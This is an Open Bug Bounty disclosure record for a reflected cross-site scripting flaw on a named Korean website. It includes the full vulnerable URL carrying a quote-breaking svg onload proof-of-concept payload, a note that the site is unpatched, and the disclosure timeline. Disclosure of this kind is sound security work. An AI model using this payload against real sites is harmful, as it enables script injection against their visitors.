sungrak.or.kr XSS vulnerability

2017-10-06T04:54:00
ID OBB:325498
Type openbugbounty
Reporter Rashed_Naamani
Modified 2018-01-04T05:28:00

Description

Vulnerable URL:
http://www.sungrak.or.kr/sr/m_view.php?mobile_dir=&ps;_db=bbs_e6jubo&ps;_boid=33%27%22%3E%3Csvg/onload=confirm(/OPENBUGBOUNTY/)%3E&ps;_page=1&ps;_sele=&ps;_ques=&ps;_line=&ps;_choi=&ps;_divi=&ps;_cate=&ps;_bcid=&ps;_mode=&ps;_pass=&ps;_mode2=&ps;_mode3=&etc;_01=&url;=&set;_language=_en
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 04.01.2018
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1694315
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 October, 2017 04:54 GMT
Generic security notifications sent to website owner| 6 October, 2017 04:56 GMT
Vulnerability details disclosed by researcher| 4 January, 2018 05:28 GMT